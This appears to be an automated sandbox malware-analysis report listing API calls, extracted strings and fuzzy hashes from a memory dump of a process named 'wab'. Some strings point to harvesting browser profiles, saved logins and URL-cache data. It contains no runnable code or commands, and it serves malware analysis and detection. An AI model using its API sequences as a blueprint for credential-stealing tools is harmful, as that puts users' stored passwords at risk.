                                            • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                            • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                            • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                            • GetClientRect.USER32(?,?), ref: 004142E1
                                            • GetWindowRect.USER32(?,?), ref: 004142EB
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                            • GetClientRect.USER32(?,?), ref: 0041433B
                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                            • String ID: %s:$EDIT$STATIC
                                            • API String ID: 2080319088-3046471546
                                            • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                            • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                            • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                            • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                            APIs
                                            • EndDialog.USER32(?,?), ref: 00413221
                                            • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                            • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                            • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                            • memset.MSVCRT ref: 00413292
                                            • memset.MSVCRT ref: 004132B4
                                            • memset.MSVCRT ref: 004132CD
                                            • memset.MSVCRT ref: 004132E1
                                            • memset.MSVCRT ref: 004132FB
                                            • memset.MSVCRT ref: 00413310
                                            • GetCurrentProcess.KERNEL32 ref: 00413318
                                            • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                            • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                            • memset.MSVCRT ref: 004133C0
                                            • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                            • memcpy.MSVCRT ref: 004133FC
                                            • wcscpy.MSVCRT ref: 0041341F
                                            • _snwprintf.MSVCRT ref: 0041348E
                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                            • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                            • SetFocus.USER32(00000000), ref: 004134B7
                                            Strings
                                            • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                            • {Unknown}, xrefs: 004132A6
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                            • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                            • API String ID: 4111938811-1819279800
                                            • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                            • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                            • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                            • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                            APIs
                                            • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                            • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                            • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                            • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                            • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                            • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                            • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                            • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                            • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                            • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                            • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                            • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                            • EndDialog.USER32(?,?), ref: 0040135E
                                            • DeleteObject.GDI32(?), ref: 0040136A
                                            • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                            • ShowWindow.USER32(00000000), ref: 00401398
                                            • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                            • ShowWindow.USER32(00000000), ref: 004013A7
                                            • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                            • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                            • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                            • String ID:
                                            • API String ID: 829165378-0
                                            • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                            • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                            • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                            • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                            APIs
                                            • memset.MSVCRT ref: 00404172
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                            • wcscpy.MSVCRT ref: 004041D6
                                            • wcscpy.MSVCRT ref: 004041E7
                                            • memset.MSVCRT ref: 00404200
                                            • memset.MSVCRT ref: 00404215
                                            • _snwprintf.MSVCRT ref: 0040422F
                                            • wcscpy.MSVCRT ref: 00404242
                                            • memset.MSVCRT ref: 0040426E
                                            • memset.MSVCRT ref: 004042CD
                                            • memset.MSVCRT ref: 004042E2
                                            • _snwprintf.MSVCRT ref: 004042FE
                                            • wcscpy.MSVCRT ref: 00404311
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                            • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                            • API String ID: 2454223109-1580313836
                                            • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                            • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                            • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                            • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                            APIs
                                              • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                            • SetMenu.USER32(?,00000000), ref: 00411453
                                            • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                            • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                            • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                            • memcpy.MSVCRT ref: 004115C8
                                            • ShowWindow.USER32(?,?), ref: 004115FE
                                            • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                            • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                            • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                            • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                            • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                              • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                              • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                            • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                            • API String ID: 4054529287-3175352466
                                            • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                            • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                            • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                            • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: wcscat$_snwprintfmemset$wcscpy
                                            • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                            • API String ID: 3143752011-1996832678
                                            • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                            • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                            • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                            • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                            APIs
                                            • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                            • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                            • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                            • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                            • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                            • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                            • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                            • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                            • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: AddressProc$HandleModule
                                            • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                            • API String ID: 667068680-2887671607
                                            • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                            • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                            • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                            • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: _snwprintfmemset$wcscpy$wcscat
                                            • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                            • API String ID: 1607361635-601624466
                                            • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                            • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                            • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                            • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: _snwprintf$memset$wcscpy
                                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                            • API String ID: 2000436516-3842416460
                                            • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                            • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                            • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                            • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                            APIs
                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                              • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                              • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                              • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                            • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                            • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                            • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                            • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                            • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                            • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                            • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                            • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                            • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                            • String ID:
                                            • API String ID: 1043902810-0
                                            • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                            • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                            • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                            • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                            APIs
                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                            • memset.MSVCRT ref: 0040E380
                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                              • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                            • wcschr.MSVCRT ref: 0040E3B8
                                            • memcpy.MSVCRT ref: 0040E3EC
                                            • memcpy.MSVCRT ref: 0040E407
                                            • memcpy.MSVCRT ref: 0040E422
                                            • memcpy.MSVCRT ref: 0040E43D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                            • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                            • API String ID: 3073804840-2252543386
                                            • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                            • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                            • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                            • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??2@??3@_snwprintfwcscpy
                                            • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                            • API String ID: 2899246560-1542517562
                                            • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                            • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                            • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                            • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                            APIs
                                            • memset.MSVCRT ref: 0040DBCD
                                            • memset.MSVCRT ref: 0040DBE9
                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                              • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                              • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                              • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                            • wcscpy.MSVCRT ref: 0040DC2D
                                            • wcscpy.MSVCRT ref: 0040DC3C
                                            • wcscpy.MSVCRT ref: 0040DC4C
                                            • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                            • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                            • wcscpy.MSVCRT ref: 0040DCC3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                            • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                            • API String ID: 3330709923-517860148
                                            • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                            • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                            • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                            • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                            APIs
                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                              • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                            • memset.MSVCRT ref: 0040806A
                                            • memset.MSVCRT ref: 0040807F
                                            • _wtoi.MSVCRT ref: 004081AF
                                            • _wcsicmp.MSVCRT ref: 004081C3
                                            • memset.MSVCRT ref: 004081E4
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                              • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                              • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                              • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                              • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                              • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                              • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                            • String ID: logins$null
                                            • API String ID: 3492182834-2163367763
                                            • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                            • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                            • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                            • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                            APIs
                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                            • memset.MSVCRT ref: 004085CF
                                            • memset.MSVCRT ref: 004085F1
                                            • memset.MSVCRT ref: 00408606
                                            • strcmp.MSVCRT ref: 00408645
                                            • _mbscpy.MSVCRT ref: 004086DB
                                            • _mbscpy.MSVCRT ref: 004086FA
                                            • memset.MSVCRT ref: 0040870E
                                            • strcmp.MSVCRT ref: 0040876B
                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                            • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                            • String ID: ---
                                            • API String ID: 3437578500-2854292027
                                            • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                            • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                            • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                            • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                            APIs
                                            • memset.MSVCRT ref: 0041087D
                                            • memset.MSVCRT ref: 00410892
                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                            • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                            • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                            • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                            • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
